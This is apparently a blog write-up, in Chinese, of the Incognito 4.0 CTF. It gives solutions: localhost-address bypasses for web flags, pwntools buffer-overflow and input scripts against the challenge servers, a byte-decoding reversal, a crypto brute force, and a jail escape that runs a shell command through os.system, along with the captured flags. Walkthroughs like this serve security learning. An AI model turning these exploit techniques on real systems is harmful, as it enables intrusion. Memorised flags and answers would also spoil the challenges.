Incognito 4.0

Web

get flag 1

题目说明

All you need to do is get the flag at :9001/flag.txt
http://45.79.210.216:5000

解题思路

[http://0.0.0.0:9001/flag.txt](http://0.0.0.0:9001/flag.txt)

get flag 2

题目说明

I have upgraded my server to make it future proof. Let’s see if you can get the flag now. Flag at :9001/flag.txt
http://45.79.216.81:5000

解题思路

http://[::]:9001/flag.txt

Pwn

babyFlow

解题思路

1
2
3
4
5
6
7
8
9
from pwn import *

p = remote('143.198.219.171',5000)
p.recv()
g = (0x14+4)*'a'+p32(0x80491fc)
p.sendline(g)
p.interactive()

#ictf{bf930bcd-6c10-4c05-bdd8-435db4b50cdb}

Gainme

解题思路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
p  = remote('143.198.219.171',5003)
p.recvline()
p.recvuntil('Level 0:')
p.sendline("ICTF4")
p.recvuntil('Level 1:')
p.sendline('dasDASQWgjtrkodsc')
p.recvuntil('Level 2:')
p.sendline(p64(0xDEADBEEF))
p.recvuntil('Level 3:')
p.sendline('1')
p.interactive()

#ictf{g@inm3-sf23f-4fd2150cd33db}

Reverse

Meow

解题思路

1
2
3
4
data=open("Meow","rb").read()
print(data[1::2].decode(errors='ignore'))

#ictf{easiest_challenge_of_them_all}

Crypto

Ancient

题目说明

Found an ancient image file but unable to figure out what this is. Could you help me out?

解题思路

下载的图片需要手动加png文件头

谷歌识图

[https://jsom1.github.io/_challenges/templed](https://jsom1.github.io/_challenges/templed)
一个比赛原题
手动对着表转一下就行

Crypto1

解题思路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
with open("result", 'r', encoding='utf-8') as f:
    cy = f.read()
print(cy)
print(len(cy))

def func(f, i):
    if i<5:
        out = ord(f) ^ 0x76 ^ 0xAD
        var1 = (out & 0xAA) >> 1
        var2 = 2 * out & 0xAA
        return var1 | var2 
    elif i>=5 and i<10:
        out = ord(f) ^ 0x76 ^ 0xBE
        var1 = (out & 0xCC) >> 2
        var2 = 4 * out & 0xCC
        return var1 | var2
    else:
        out = ord(f) ^ 0x76 ^ 0xEF
        var1 = (out & 0xF0) >> 4
        var2 = 16 * out & 0xF0
        return var1 | var2

dic = {}
flag = ''
for i in range(15):
    for j in range(128):
        t = chr(func(chr(j), i))
        if t==cy[i]:
            print(i, chr(j), j)
            flag += chr(j)
            break

print(flag)

#ictf{88f30d1cd1ab443}

TheOnlyJail

TheOnlyJail

解题思路

1
2
3
4
import os
import base64

os.system(b64.base64decode("some_base64_encoded_command_like_cat /home/ctf/flag.txt"))
CTF > 比赛Write Up
#比赛Write Up
Incognito 4.0
http://example.com/2023/02/20/Incognito 4.0/
作者
Hor1zon
发布于
2023年2月20日
许可协议
BY J_0K3R